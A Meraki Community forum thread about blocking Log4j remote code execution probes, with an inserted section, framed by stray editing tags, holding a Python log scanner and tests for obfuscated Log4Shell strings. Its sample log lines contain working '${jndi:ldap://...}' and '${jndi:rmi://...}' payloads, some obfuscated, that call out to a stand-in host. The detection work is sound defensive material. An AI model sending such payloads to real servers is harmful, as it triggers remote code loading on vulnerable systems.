Hammered with IDS alerts

Hi guys,


For a few weeks now, we have been hammered with Apache Log4j logging remote code execution attempts from host0484.sdjihtbwyu8rtgutrw.com. How can I absolutely ensure this traffic is dropped?


The MX identifies that this traffic originates from Poland, so I have added that country to our Geo blocklist. I've also added an L7 rule to deny this IP. Are there any other steps I should take to combat this threat actor? We are an SME and there's only a handful of us in IT, none of us are security specialists, so I want to make as sure as I can that this IP is blackholed, blocked, bounced, whatever - as long as it doesn't get through!


Thanks all

J 🙂




If your MX is running in IPS mode with the Security ruleset selected, and if your firmware is up to date, the Snort engine will catch these for you.


Had these at several customer sites and it was always caught by the MX, regardless of the source IP.


Create a layer 7 firewall rule blocking traffic for this host.  This blocks both inbound and outbound traffic.


</gre_replace>
<gr_insert after="37" cat="add_content" lang="python" orig="Kind of a big deal">
The alerts the original poster describes are Log4Shell (CVE-2021-44228) probes: a `${jndi:...}` lookup string placed in a request header or URL, which a vulnerable Log4j logs and then resolves by fetching a payload from the attacker's LDAP or RMI server. The second reply's point that the IPS catches these "regardless of the source IP" matters because scanners rotate hosts and obfuscate the string, so matching the technique is more durable than blocking one address or country. The script below is an added example, not code from the original thread, from Cisco Meraki or from the Snort ruleset: it normalises the common obfuscations (percent-encoding, `${lower:j}`, `${::-j}` default-value tricks), flags the attempt in Apache access log lines, and pulls out the callback host, which is usually a different machine from the one sending the probes and is the address worth feeding into a blocklist. The log lines, IP addresses and function names are constructed for the example.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed Apache combined-format access log lines for the example (not from
# the original thread). Three lines carry a Log4Shell JNDI lookup, the last is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2022:08:12:41 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.7 - - [10/Jan/2022:08:12:43 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/b} HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2022:08:12:45 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}:%2F%2F203.0.113.9:1099/c}"
198.51.100.5 - - [10/Jan/2022:08:13:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

# ${::-j} and ${env:NOPE:-j} both evaluate to the text after ":-" in Log4j.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# ${lower:j} / ${upper:j} evaluate to the wrapped text (case is folded separately).
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}")
# The literal lookup after normalisation: ${jndi:<scheme>://<target>
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s]*)")


def normalise(raw: str, rounds: int = 10) -> str:
    """Undo common obfuscations so the literal ${jndi: shows through.

    1) percent-decode (repeated, bounded, so %2524 style nesting is handled),
    2) fold case, 3) collapse default-value and lower/upper lookups, innermost
    first, until nothing changes or the round limit is hit.
    """
    text = raw
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = text.lower()
    for _ in range(rounds):
        collapsed = _DEFAULT_LOOKUP.sub(r"\1", text)
        collapsed = _CASE_LOOKUP.sub(r"\1", collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_log(log_text: str) -> List[Dict[str, str]]:
    """Return one record per log line that carries a JNDI lookup.

    Each record holds the probing client IP (first field of the Apache line),
    the JNDI scheme (ldap, rmi, dns, ...) and the callback target.
    """
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client_ip = line.split(" ", 1)[0]
        match = _JNDI.search(normalise(line))
        if match:
            hits.append({"client": client_ip,
                         "scheme": match.group(1),
                         "target": match.group(2)})
    return hits


def callback_hosts(hits: List[Dict[str, str]]) -> List[str]:
    """Hosts the payloads would be fetched from; these are the blocklist candidates."""
    hosts = set()
    for hit in hits:
        hostport = hit["target"].split("/", 1)[0]
        hosts.add(hostport.rsplit(":", 1)[0])
    return sorted(hosts)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(f"probe from {hit['client']}: {hit['scheme']}://{hit['target']}")
    print("callback hosts to block:", ", ".join(callback_hosts(found)))
```

Run against a real access log with `scan_log(open(path).read())`. Note that the probing client (`203.0.113.7` in the sample) and the callback host (`203.0.113.9`) are different addresses; blocking only the scanner's IP or country does nothing about the second-stage fetch, which is why patching Log4j and relying on the IPS signature, as the first reply suggests, beats chasing individual source addresses.
<test>
hits = scan_log(SAMPLE_LOG)
assert len(hits) == 3
assert [h["scheme"] for h in hits] == ["ldap", "ldap", "rmi"]
assert all(h["client"] == "203.0.113.7" for h in hits)
assert hits[0]["target"] == "203.0.113.9:1389/a"
assert hits[2]["target"] == "203.0.113.9:1099/c"
assert callback_hosts(hits) == ["203.0.113.9"]
assert normalise("${${lower:j}ndi:${lower:l}dap://x/y}") == "${jndi:ldap://x/y}"
assert normalise("${${::-j}${::-n}${::-d}${::-i}:rmi:%2F%2Fh/z}") == "${jndi:rmi://h/z}"
assert scan_log("198.51.100.5 - - [10/Jan/2022:08:13:01 +0000] \"GET / HTTP/1.1\" 200 1 \"-\" \"curl/7.0\"") == []
</test>
</gr_insert>
<gr_replace lines="41-43" cat="remove_boilerplate" orig="Get notified">



Get notified when there are additional replies to this discussion.
Welcome to the Meraki Community!
To start contributing, simply sign in with your Cisco account. If you don't yet have a Cisco account, you can sign up.